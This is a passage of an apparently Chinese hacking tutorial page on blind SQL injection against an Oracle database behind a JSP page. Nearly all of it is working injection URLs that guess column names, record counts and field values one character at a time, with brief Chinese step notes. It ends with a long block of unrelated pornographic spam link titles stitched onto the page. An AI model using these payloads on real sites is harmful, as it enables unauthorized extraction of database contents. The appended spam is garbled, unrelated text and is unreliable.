http://www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 88>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)


第一個記錄的第一位值為:
4、 猜解數據值:

 數據值長度為一位:1

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)

 數據長度為:9條記錄
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

以下猜解記錄值
 第一行第一列記錄的長度為:1,值為:1
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第一行第一列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第二行第一列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第二行第二列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 猜解第三個記錄的長度為:(其它記錄依次類推)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))




熱詞搜索:

上一篇:教您15招保養筆記本硬盤
下一篇:網絡流行黑客軟件簡介

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
色偷偷成人一区二区三区91| 日韩电影在线免费观看| 国产91露脸合集magnet| 一区二区三区免费在线观看| 国产精品人成在线观看免费| 欧美一级一区二区| 日本高清成人免费播放| 99国产精品久久久久| 国产成人啪免费观看软件| 麻豆国产精品一区二区三区 | 在线播放中文字幕一区| 欧美午夜不卡视频| 欧美精品粉嫩高潮一区二区| 欧美日韩国产系列| 日韩欧美一区二区三区在线| 日韩欧美国产麻豆| 久久女同互慰一区二区三区| 国产三级欧美三级日产三级99| 2020日本不卡一区二区视频| 国产色产综合色产在线视频| 国产三级一区二区三区| 亚洲欧美在线观看| 亚洲国产视频网站| 韩国v欧美v日本v亚洲v| 成人免费av资源| 91美女蜜桃在线| 欧美日韩国产成人在线91| 日韩视频在线永久播放| 欧美精品一区二区三区蜜桃| 国产精品久久久99| 亚洲一二三四区| 日本aⅴ亚洲精品中文乱码| 秋霞午夜鲁丝一区二区老狼| 精品一区二区三区免费毛片爱| 国产精品综合一区二区三区| 一本久久a久久精品亚洲| 一本色道久久综合狠狠躁的推荐| 欧美伊人久久大香线蕉综合69| 制服.丝袜.亚洲.中文.综合| 国产蜜臀97一区二区三区| 99久久综合99久久综合网站| 久久亚洲捆绑美女| 午夜欧美在线一二页| 国产视频911| 92精品国产成人观看免费| 国产精品原创巨作av| 欧美三电影在线| 亚洲1区2区3区4区| 91久久精品一区二区三| 一区二区三区精品| 成人免费视频播放| 国产中文字幕精品| 国产精品成人午夜| 26uuu精品一区二区在线观看| 2欧美一区二区三区在线观看视频 337p粉嫩大胆噜噜噜噜噜91av | 久久er精品视频| 麻豆91在线看| 久久草av在线| 欧美日韩国产综合一区二区| 一本一道波多野结衣一区二区| 成人少妇影院yyyy| 亚洲一二三区不卡| 91福利社在线观看| 久久国产精品99久久久久久老狼 | 国产一区二区在线影院| 一区二区三区四区在线播放| 一区二区三区美女| 日本韩国欧美一区| 亚洲欧美日韩系列| 国产精品久久久久aaaa| 亚洲三级小视频| 国产精品私人影院| 国产视频一区二区在线| 亚洲欧美一区二区在线观看| 成人欧美一区二区三区在线播放| 中文字幕亚洲综合久久菠萝蜜| 中文幕一区二区三区久久蜜桃| 成人免费在线视频| 亚洲成人午夜影院| 精品无人区卡一卡二卡三乱码免费卡| 免费一级欧美片在线观看| 国产传媒日韩欧美成人| 一本色道久久综合亚洲aⅴ蜜桃 | 国产激情一区二区三区四区| 成人黄色在线看| 欧美曰成人黄网| 精品女同一区二区| 亚洲人成精品久久久久久| 日韩精品国产精品| 成人国产视频在线观看| 在线电影一区二区三区| 国产精品无遮挡| 婷婷丁香久久五月婷婷| 国产精品羞羞答答xxdd| 精品视频一区 二区 三区| 久久久91精品国产一区二区三区| 一区二区三区蜜桃| 国产成人在线电影| 欧美美女一区二区| 国产精品国产三级国产有无不卡 | 亚洲精品一区二区三区四区高清| 日韩一区日韩二区| 国产麻豆午夜三级精品| 欧美日韩在线不卡| 国产精品久久久一区麻豆最新章节| 日韩中文字幕不卡| 91蝌蚪国产九色| 中文字幕成人在线观看| 极品美女销魂一区二区三区| 欧美午夜寂寞影院| 亚洲欧美一区二区三区久本道91| 国产一区二区看久久| 日韩欧美综合在线| 性做久久久久久免费观看| 99精品国产91久久久久久| 久久综合狠狠综合| 韩国欧美国产一区| 日韩免费性生活视频播放| 亚洲第一久久影院| 欧美日韩精品电影| 日韩精品三区四区| 欧美老女人第四色| 午夜精品一区二区三区三上悠亚| 91蜜桃网址入口| 亚洲另类中文字| 色吧成人激情小说| 一区二区在线看| 色婷婷久久久久swag精品 | 中文字幕在线不卡一区二区三区| 久久国产剧场电影| 欧美va亚洲va在线观看蝴蝶网| 亚洲一区中文在线| 欧美日韩国产片| 日韩1区2区3区| 欧美成人精品高清在线播放| 91免费版pro下载短视频| 亚洲欧洲日本在线| 欧美在线观看视频一区二区三区| 亚洲欧美成aⅴ人在线观看| 风间由美中文字幕在线看视频国产欧美| 7777精品伊人久久久大香线蕉完整版 | 亚洲精品成a人| 欧美日韩一区二区三区在线| 洋洋av久久久久久久一区| 色哟哟欧美精品| 亚洲午夜电影在线| 日韩精品一区在线| 蜜桃一区二区三区在线| 精品欧美一区二区久久| 紧缚捆绑精品一区二区| 久久精品男人天堂av| 成人午夜视频免费看| 亚洲视频免费在线| 欧美日韩国产高清一区| 一区二区三区鲁丝不卡| 这里只有精品电影| www.久久久久久久久| 亚洲人成网站在线| 欧美色男人天堂| 精品一区二区三区免费观看| 国产亚洲一区二区三区四区| 高清beeg欧美| 亚洲高清视频在线| 日韩三级精品电影久久久| 国产激情视频一区二区三区欧美| 精品国产麻豆免费人成网站| 国产成人aaaa| 亚洲美女电影在线| 精品国产凹凸成av人导航| 成人免费毛片嘿嘿连载视频| 亚洲精品欧美专区| 精品国产91久久久久久久妲己| 国产成人亚洲精品狼色在线| 亚洲欧美日韩在线| 亚洲精品一区二区三区香蕉| 91一区二区在线观看| 日韩成人av影视| 日本一区二区电影| 欧美偷拍一区二区| 国产成人综合亚洲91猫咪| 天天影视网天天综合色在线播放| 国产日韩欧美麻豆| 欧美色图12p| 